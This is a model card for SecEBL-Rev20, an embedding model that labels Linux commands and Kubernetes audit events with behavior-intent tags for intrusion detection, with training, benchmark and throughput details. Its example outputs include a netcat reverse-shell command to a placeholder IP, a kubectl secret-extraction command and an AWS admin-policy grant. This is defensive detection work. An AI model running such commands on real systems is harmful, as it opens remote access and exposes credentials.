SecEBL / README.md

Switch model release license to Apache 2.0

21c1d18 7 days ago

20.1 kB

	---
	license: apache-2.0
	base_model: Alibaba-NLP/gte-modernbert-base
	library_name: sentence-transformers
	pipeline_tag: sentence-similarity
	tags:
	- security
	- intrusion-detection
	- behavior-analytics
	- intent-recognition
	- linux
	- kubernetes
	- audit-log
	- sentence-transformers
	---

	# SecEBL-Rev20

	SecEBL stands for Security Event Behavior Labeler.

	SecEBL-Rev20 is an intent-recognition model for security telemetry. It maps a
	Linux command line or normalized Kubernetes AuditLog event into ranked
	behavior-intent labels, so downstream detection can reason about what an actor
	is trying to do instead of only matching fixed strings, allowlists, blacklists,
	or opaque risk scores.

	Project repository: [github.com/EBWi11/SecEBL](https://github.com/EBWi11/SecEBL)

	## At A Glance

	\| Area \| Current release summary \|
	\| --- \| --- \|
	\| Stable public API \| L1 behavior-intent labeling with ranked `top_labels`. \|
	\| Behavior vocabulary \| 361 Rev20 behavior-intent tags across 12 security behavior groups. \|
	\| Training scale \| 86,285 internal corpus rows, 82,895 usable training observations, and 118,858 effective command/tag training pairs. \|
	\| Corpus breadth \| Linux commands plus normalized Kubernetes AuditLog events, covering roughly 2,700 distinct Linux first-token/tool forms and common security/operations tooling. \|
	\| Benchmark scale \| 12,594-row internal Linux command benchmark covering all 361 behavior tags, 663 internal Linux sessions, and a 6,286,568-row / 102,117-session pressure stream. \|
	\| L1 accuracy \| 98.49% top5 any-hit and 96.44% micro recall@5 on the internal Linux command benchmark; 100.00% top5 coverage on the K8s evaluation set. \|
	\| Inference performance \| RTX 5090 spot-check: mean 5,308.72 unique cmdlines/s with FP16 + SDPA; exact raw-event cache lookup measured separately at about 1.8M rows/s. \|
	\| Training setup \| `Alibaba-NLP/gte-modernbert-base`, MNRL with hard-negative-aware batches, RTX 5090 32GB, 128 full-pass epochs, batch size 112, about 16.2 hours. \|

	The public examples include a reviewed, publicly releasable subset of the
	internal Linux final benchmark plus normalized Kubernetes AuditLog examples:
	10,520 Linux rows across 531 sessions and 144 K8s rows across 46 sessions. They
	exist so users can run the model locally and inspect outputs without access to
	private telemetry.
	The full training corpora, full internal benchmarks, private pressure-stream
	rows, and private run logs are not redistributed because parts of them contain
	real telemetry or real operational context.

	## First-Time User Path

	Use the companion GitHub repository for the runnable code and this Hugging Face
	repository for model artifacts:

	```bash
	git clone https://github.com/EBWi11/SecEBL.git
	cd SecEBL

	git lfs install
	git clone https://huggingface.co/willchen0011/SecEBL model_artifacts

	pip install -e .
	scripts/run_examples.sh
	```

	After the script finishes, inspect:

	```text
	runs/examples/linux_l1/predictions.jsonl
	runs/examples/l2/example_linux_session_results.json
	```

	L1 is the stable behavior-labeling API. It outputs ranked behavior evidence,
	not an intrusion verdict. L2 is optional and experimental; it runs only when an
	L2 artifact such as `model_artifacts/l2_artifacts/logreg.joblib` is available.

	## What This Repository Contains

	This Hugging Face repository is the model artifact bundle.

	\| Path \| Purpose \|
	\| --- \| --- \|
	\| `model.safetensors`, tokenizer/config files \| SentenceTransformers-compatible SecEBL-Rev20 embedding model. \|
	\| `semantic_texts.jsonl` \| Rev20 semantic label texts used by the L1 retrieval path. \|
	\| `schema/tags_schema_rev20.json` \| Canonical Rev20 behavior vocabulary, 361 tags across 12 groups. \|
	\| `examples/linux/` \| Public subset of the internal Linux final benchmark and matching Rev20 labels. \|
	\| `examples/k8s/` \| Public normalized Kubernetes AuditLog examples and matching Rev20 labels. \|
	\| `examples/manifest.json` \| Public example subset counts and distribution. \|
	\| `rev20_tag_rfc.md` \| Rev20 behavior-tag labeling RFC and boundary examples. \|
	\| `l2_artifacts/logreg.joblib` \| Experimental L2 logistic-regression session scorer. \|
	\| `l2_artifacts/tag_risk_policy.rev20.json` \| Matching L2 feature policy. Its tag-selection settings are internal to L2 feature extraction. \|
	\| `l2_artifacts/train_summary.json` \| Public aggregate L2 training/evaluation summary with no raw rows or real session identifiers. \|
	\| `LICENSE`, `NOTICE` \| Model license and attribution notices. \|

	This repository does not include the runnable helper scripts. Use
	[EBWi11/SecEBL](https://github.com/EBWi11/SecEBL) for the Python package and
	one-command test script. The same public benchmark-subset examples are included
	here for convenience.

	## Output Shape

	L1 predictions expose ranked `top_labels`:

	```json
	{
	"observation_id": "event:0",
	"command": "nc -e /bin/sh 203.0.113.10 4444",
	"top_labels": [
	{
	"label_id": "spawn_reverse_shell",
	"score": 0.811,
	"axis": "execution_and_process"
	},
	{
	"label_id": "connect_external_service",
	"score": 0.488,
	"axis": "network"
	}
	]
	}
	```

	L1 does not emit `behavior_tags` and does not apply a user-facing tag-selection
	threshold. `behavior_tags[]` is the field used by training and evaluation label
	files. Runtime prediction output is ranked `top_labels`.

	## Why Intent Labels Matter

	Traditional IDS pipelines often depend on signatures, rules, allowlists,
	blacklists, and low-explainability tabular ML. Those tools still matter, but
	they can struggle when legitimate tools are used in suspicious ways, when tool
	syntax drifts quickly, or when the same behavior appears in different telemetry
	formats.

	SecEBL adds an intermediate representation:

	```text
	raw security event
	-> L1 behavior-intent recognition
	-> L2 session reasoning or another downstream detector
	-> alert / review / policy
	```

	L1 intentionally does not decide that a single event is an intrusion. It
	produces explainable behavior evidence such as `read_credential_material`,
	`execute_remote_command`, `create_scheduled_task`, `grant_cluster_privilege`,
	or `query_service_health`.

	This is useful for:

	- LOLT / living-off-the-land behavior where the tool is legitimate but the
	behavior may be suspicious in context.
	- Rule-writing lag, where new tool syntax appears faster than signatures can be
	maintained.
	- Multi-platform telemetry, where Linux commands, Kubernetes audit events, and
	future telemetry can share a behavior vocabulary.
	- Explainable detection, where an alert should be tied to explicit behavior
	labels rather than only an opaque score.

	## Data And Vocabulary

	Rev20 is a flat behavior-tag schema.

	\| Item \| Count \|
	\| --- \| ---: \|
	\| Top-level behavior groups \| 12 \|
	\| Behavior tags \| 361 \|

	Schema groups:

	\| Group \| Tags \|
	\| --- \| ---: \|
	\| `observation_and_discovery` \| 51 \|
	\| `configuration_and_log_modification` \| 12 \|
	\| `filesystem_and_data` \| 33 \|
	\| `execution_and_process` \| 28 \|
	\| `network` \| 51 \|
	\| `identity_auth_and_secrets` \| 31 \|
	\| `persistence_services_and_storage` \| 27 \|
	\| `kernel_memory_and_tracing` \| 14 \|
	\| `package_build_and_source` \| 19 \|
	\| `database_and_infrastructure_services` \| 33 \|
	\| `containers_and_cloud_native` \| 34 \|
	\| `cloud_control_plane` \| 28 \|

	The release baseline was trained from internal Rev20 corpora:

	\| Corpus \| Rows \| Unique behavior tags \| Notes \|
	\| --- \| ---: \| ---: \| --- \|
	\| Linux command corpus \| 85,277 \| 361 \| Mixed generated, reviewed, and manually expanded command examples. \|
	\| Kubernetes AuditLog corpus \| 1,008 \| 40 \| Manually authored normalized K8s audit events. \|

	The Linux corpus covers roughly 2,700 distinct first-token/tool forms by a
	conservative executable-name estimate. Common families include shell utilities,
	network tools, package/build tools, cloud CLIs, IaC tools, container tooling,
	databases, secret stores, and Kubernetes tooling.

	## Training Details

	The raw training corpora are not redistributed, but the following details are
	documented so readers can understand the model scale and method.

	\| Item \| Value \|
	\| --- \| --- \|
	\| Base model \| `Alibaba-NLP/gte-modernbert-base` \|
	\| Training objective \| `MultipleNegativesRankingLoss` with hard-negative-aware batches \|
	\| Training hardware \| NVIDIA GeForce RTX 5090, 32GB VRAM, `cuda:0` \|
	\| Epochs \| 128 full-pass epochs \|
	\| Batch size \| 112 \|
	\| Precision \| `fp32` \|
	\| Steps \| 1,062 steps per epoch; 135,936 total optimizer steps \|
	\| Runtime \| 58,291 seconds, about 16.2 hours \|
	\| Sequence length \| 160 tokens \|
	\| Optimizer schedule \| learning rate `2e-5`, warmup ratio `0.06`, 8,156 warmup steps, weight decay `0.01` \|

	Training data scale:

	\| Training artifact \| Count \| Notes \|
	\| --- \| ---: \| --- \|
	\| Combined corpus rows \| 86,285 \| 85,277 Linux command rows plus 1,008 K8s AuditLog rows. \|
	\| Non-empty training observations \| 82,895 \| Rows with usable behavior labels after skipping 3,390 abstain rows. \|
	\| Base command-tag pairs \| 117,092 \| Positive command/tag pairs before boundary upsampling. \|
	\| Effective positive pairs \| 118,858 \| Final pair count after targeted boundary upsampling. \|
	\| Behavior labels \| 361 \| Full Rev20 behavior vocabulary used on the label side. \|

	The Linux corpus is intentionally mixed rather than a single synthetic source.
	The largest source slices are roughly 36.9k generated rows, 28.5k manually
	reviewed rows, 4.0k benchmark-prune/migration rows, 3.6k common-difference gap
	rows, 2.7k reviewed generated rows, 2.6k baseline manual rows, and 2.3k attack
	batch rows, plus smaller targeted boundary, miss-review, public-attack, and
	high-miss batches.

	Token lengths are short enough for a compact encoder. Across the final pair set,
	command-side text is p50 32 tokens, p90 55, p95 68, and p99 113; fewer than
	0.3% of examples exceed the 160-token training limit. Label-side semantic texts
	are p50 40 tokens and p95 62.

	Hard negatives were designed in two layers:

	- Schema-level negatives: the dataset builder used `schema_hard`, with a
	16-item hard-negative pool and up to 8 negatives per positive before MNRL
	batching. These negatives come from semantically nearby Rev20 tags, so the
	model is forced to separate labels such as read-vs-search, inspect-vs-modify,
	local-vs-remote execution, and similar tool-boundary cases.
	- Batch-level negatives: the training loader used hard-negative-aware MNRL
	batches. The final run used config
	`rev20_conservative_20260620_ep96_miss_v11`, covering 74 difficult labels and
	placing 2 hard-negative labels near each anchor where possible.
	- Boundary upsampling: 1,766 boundary-sensitive pairs were duplicated once,
	producing 1,766 extra training exposures. These rows target recurring failure
	modes such as grep/read ambiguity, wrapper commands, tool-specific boundaries,
	no-hit review cases, and post-evaluation miss-review batches.

	## Public Benchmark Subset

	This Hugging Face repository includes the same public benchmark examples as the
	companion GitHub repository: the Linux benchmark subset under `examples/linux/`
	and normalized Kubernetes AuditLog examples under `examples/k8s/`.

	\| Public artifact \| Rows \| Sessions \| Notes \|
	\| --- \| ---: \| ---: \| --- \|
	\| `examples/linux/example_sessions.jsonl` \| 10,520 \| 531 \| Publicly releasable subset of the internal Linux final benchmark; 2,934 normal-operation rows and 7,586 intrusion rows. \|
	\| `examples/linux/example_gold.rev20.jsonl` \| 10,520 \| 531 \| Matching Rev20 behavior labels; 10,019 labeled rows, 14,807 behavior-label instances, and 349 unique behavior tags. \|
	\| `examples/k8s/example_sessions.jsonl` \| 144 \| 46 \| Public normalized Kubernetes AuditLog examples; 72 normal-operation rows and 72 intrusion rows. \|
	\| `examples/k8s/example_gold.rev20.jsonl` \| 144 \| 46 \| Matching Rev20 behavior labels; 144 labeled rows, 163 behavior-label instances, and 27 unique behavior tags. \|

	Session-level labels use English enums: `normal_operation` and `intrusion`.
	The full internal Linux benchmark remains larger: 12,594 rows, 663 sessions,
	and complete 361-tag coverage.

	## Evaluation Snapshot

	The full internal benchmark data is not public. The aggregate size,
	distribution, and metrics are public so users can understand what the headline
	numbers mean.

	Evaluation scale:

	\| Dataset \| Rows \| Rows with labels \| Behavior-tag instances \| Unique behavior tags \|
	\| --- \| ---: \| ---: \| ---: \| ---: \|
	\| Linux internal benchmark \| 12,594 \| 11,889 \| 17,287 \| 361 / 361 \|
	\| K8s evaluation set \| 144 \| 144 \| 163 \| 27 / 361 \|
	\| Combined \| 12,738 \| 12,033 \| 17,450 \| 361 / 361 \|

	Retrieval quality:

	\| Dataset \| Dynamic exact \| Top5 any-hit \| Top5 all-covered \| Micro recall@5 \|
	\| --- \| ---: \| ---: \| ---: \| ---: \|
	\| Linux internal benchmark \| 87.32% \| 98.49% \| 95.44% \| 96.44% \|
	\| K8s evaluation set \| 99.31% \| 100.00% \| 100.00% \| 100.00% \|
	\| Combined \| 87.47% \| 98.50% \| 95.50% \| 96.47% \|

	The Linux benchmark covers the complete 361-tag Rev20 vocabulary and includes
	complex multi-tag command rows. The K8s result should be read as a small-domain
	sanity result rather than broad Kubernetes coverage because the current K8s
	corpus is much smaller than the Linux corpus.

	Internal Linux benchmark tag cardinality:

	\| Tags per row \| Rows \|
	\| --- \| ---: \|
	\| 0 \| 705 \|
	\| 1 \| 8,829 \|
	\| 2 \| 1,567 \|
	\| 3 \| 901 \|
	\| 4 \| 402 \|
	\| 5 \| 139 \|
	\| 6+ \| 51 \|

	Top internal Linux benchmark tags:

	\| Tag \| Count \|
	\| --- \| ---: \|
	\| `stage_temporary_path` \| 987 \|
	\| `inspect_network_state` \| 801 \|
	\| `stage_hidden_path` \| 655 \|
	\| `inspect_current_identity` \| 578 \|
	\| `read_credential_material` \| 551 \|
	\| `inspect_system_state` \| 481 \|
	\| `inspect_infrastructure_service` \| 390 \|
	\| `query_dns_records` \| 372 \|
	\| `enumerate_filesystem` \| 365 \|
	\| `search_credentials` \| 315 \|

	## Example Outputs

	These examples show the user-facing L1 output style. Scores are cosine/retrieval
	scores after the release prompt profile. The public helper scripts save top
	labels in `predictions.jsonl`.

	\| Event \| Top 3 L1 tags \| Note \|
	\| --- \| --- \| --- \|
	\| `nc -e /bin/sh 203.0.113.10 4444` \| <code>spawn_reverse_shell</code> 0.811<br><code>connect_external_service</code> 0.488<br><code>spawn_bind_shell</code> 0.451 \| `-e` is recognized as reverse-shell execution. \|
	\| `nc -v 203.0.113.10 443` \| <code>connect_external_service</code> 0.732<br><code>spawn_reverse_shell</code> 0.503<br><code>create_reverse_tunnel</code> 0.412 \| Connection intent ranks above shell-spawn intent. \|
	\| `cat /root/install.log` \| <code>read_business_log</code> 0.641<br><code>read_system_log</code> 0.431<br><code>read_workload_logs</code> 0.385 \| Log-read semantics dominate. \|
	\| `cat /root/install.conf` \| <code>read_infrastructure_config</code> 0.620<br><code>read_system_config</code> 0.612<br><code>read_kernel_parameter</code> 0.336 \| Config-read semantics dominate. \|
	\| `kubectl -n prod get secret payment-api-token -o jsonpath={.data.token} \\| base64 -d` \| <code>read_cluster_secret</code> 0.730<br><code>decode_data</code> 0.716<br><code>read_credential_material</code> 0.363 \| K8s secret extraction and decoding. \|
	\| `aws iam attach-user-policy --user-name temp --policy-arn arn:aws:iam::aws:policy/AdministratorAccess` \| <code>grant_cloud_privilege</code> 0.838<br><code>modify_cloud_identity_policy</code> 0.535<br><code>modify_cloud_identity</code> 0.459 \| Cloud privilege escalation semantics. \|
	\| `curl -fsS http://127.0.0.1:8080/healthz` \| <code>query_service_health</code> 0.840<br><code>inspect_local_kubernetes_cluster</code> 0.459<br><code>inspect_container_runtime</code> 0.383 \| Local service health check. \|

	## Runtime Performance

	SecEBL-Rev20 is a SentenceTransformers-style embedding retriever over 361 Rev20
	tag definitions. The serving path embeds the event, embeds or loads tag
	definition embeddings, then ranks tags by similarity.

	Current single-card CUDA recommendation:

	\| Setting \| Value \|
	\| --- \| --- \|
	\| Precision \| FP16 \|
	\| Attention \| SDPA \|
	\| `max_seq_length` \| 160 \|
	\| Batch size \| 224 default; 384 was slightly faster in one RTX 5090 sweep but not enough to replace the stable default \|
	\| Sorting \| `sort_by=char` \|
	\| Padding \| dynamic, no forced pad alignment \|
	\| Output path \| GPU tensor output plus GPU top-k \|

	Measured on an NVIDIA GeForce RTX 5090 32GB spot-check:

	\| Mode \| Throughput \|
	\| --- \| ---: \|
	\| Recommended no-cache unique inference, `bs224` \| mean 5,308.72 unique cmdlines/s \|
	\| Recommended no-cache latency, `bs224` \| about 0.1884 ms per unique cmdline \|
	\| `bs224` repeat range \| 5,025.47 - 5,433.78 unique cmdlines/s \|
	\| Best quick-sweep point, `bs384` \| 5,378.45 unique cmdlines/s \|

	Exact raw-event cache lookup was measured separately at mean 1,817,462.76
	rows/s. Cache hits reuse saved L1 top-k results and do not run model inference.

	## L2 Artifact

	This repository includes an experimental fitted L2 session scorer so the
	companion GitHub `scripts/run_examples.sh` can run the public Linux and K8s L1
	examples, plus Linux example-session scoring, when this model directory is used
	as `MODEL_DIR`.

	In this release, a session is a sequence of events grouped by `session_id`.
	L1 labels each event independently. L2 scores the whole session by aggregating
	cached L1 ranked tags, retrieval scores, tag diversity, behavior transitions,
	and routine-operation context. The L2 output is a session-level verdict such as
	`intrusion` or `normal_operation`, not a replacement for per-command behavior
	tags.

	For compatibility with the released L2 artifact, L2 derives its session
	features from cached L1 `top_labels` using an internal selected-tag feature
	path. In plain terms, L2 filters the cached ranked labels inside its own feature
	builder before session scoring. This does not change L1 prediction output:
	users still receive ranked `top_labels`, not a selected `behavior_tags` field.

	Runtime L2 does not use raw command text, user names, host names, or session ids
	as scoring features. Session ids may appear in private data-prep workflows for
	label assignment, but they are not runtime allow/deny lists.

	Internal L2 summary:

	\| Check \| Result \|
	\| --- \| ---: \|
	\| Withheld Linux session benchmark \| 663 sessions, 365 TP, 298 TN, 0 FP, 0 FN \|
	\| 7M pressure-stream fit-check \| 6,286,568 rows, 102,117 sessions, 61 alert sessions \|
	\| OOF validation \| 5,747 sessions, 99.39% accuracy, 96.44% attack precision, 95.31% attack recall \|

	The 7M pressure-stream result was measured on real background telemetry plus
	embedded synthetic attack sessions. The underlying rows and real session
	identifiers are not redistributed. The included L2 artifact is a
	research/reproducibility component, not a general production IDS claim.

	## Direct SentenceTransformers Loading

	You can load the embedding model directly:

	```python
	from sentence_transformers import SentenceTransformer

	model = SentenceTransformer("willchen0011/SecEBL")
	```

	Direct loading gives you the encoder only. SecEBL is a retrieval-style labeler:
	encode the event, encode or load the Rev20 semantic label texts from
	`semantic_texts.jsonl`, rank labels by cosine similarity, and save the top-k
	labels. For normal use, prefer the companion GitHub helpers because they keep
	the prompt profile, semantic text loading, top-k output format, and optional L2
	feature path aligned with this release.

	## Intended Use

	- Research and evaluation of security-event behavior labeling.
	- Internal security detection, investigation, and triage for systems an
	organization owns, operates, administers, or is explicitly authorized to
	defend.
	- Building session-level risk scoring over SecEBL behavior-label streams.

	## Out Of Scope

	- Standalone verdicting on a single event.
	- Authorization or policy-compliance decisions without human validation.
	- Monitoring systems you are not authorized to defend.

	## License

	This Hugging Face repository is released under Apache License 2.0.

	The base model is `Alibaba-NLP/gte-modernbert-base`, which is also Apache-2.0.
	Source code, schemas, public examples, public documentation, helper scripts,
	model artifacts, and the experimental L2 artifact are Apache-2.0 unless a file
	explicitly states otherwise.